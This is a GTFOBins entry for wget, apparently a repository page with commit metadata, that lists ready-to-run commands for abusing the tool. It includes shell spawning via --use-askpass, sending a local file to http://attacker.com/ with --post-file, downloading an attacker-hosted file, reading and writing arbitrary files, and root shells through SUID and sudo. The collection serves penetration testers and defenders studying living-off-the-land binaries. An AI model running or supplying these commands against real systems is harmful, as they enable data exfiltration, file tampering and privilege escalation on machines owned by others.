GTFOBins.github.io/_gtfobins/wget.md
Emanuel Duss 01042c2aa1
Add wget shell via --use-askpass
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-12-16 16:33:15 +01:00

1.7 KiB

functions
shell file-upload file-read file-write file-download suid sudo
code
TF=$(mktemp) chmod +x $TF echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF wget --use-askpass=$TF 0
description code
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data. URL=http://attacker.com/ LFILE=file_to_send wget --post-file=$LFILE $URL
description code
The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages, thus this is not suitable to read arbitrary binary data. LFILE=file_to_read wget -i $LFILE
description code
The data to be written is treated as a list of URLs, one per line, which are actually fetched by `wget`. The data is written, somewhat modified, as error messages, thus this is not suitable to write arbitrary binary data. LFILE=file_to_write TF=$(mktemp) echo DATA > $TF wget -i $TF -o $LFILE
description code
Fetch a remote file via HTTP GET request. URL=http://attacker.com/file_to_get LFILE=file_to_save wget $URL -O $LFILE
code
TF=$(mktemp) chmod +x $TF echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF ./wget --use-askpass=$TF 0
code
TF=$(mktemp) chmod +x $TF echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF sudo wget --use-askpass=$TF 0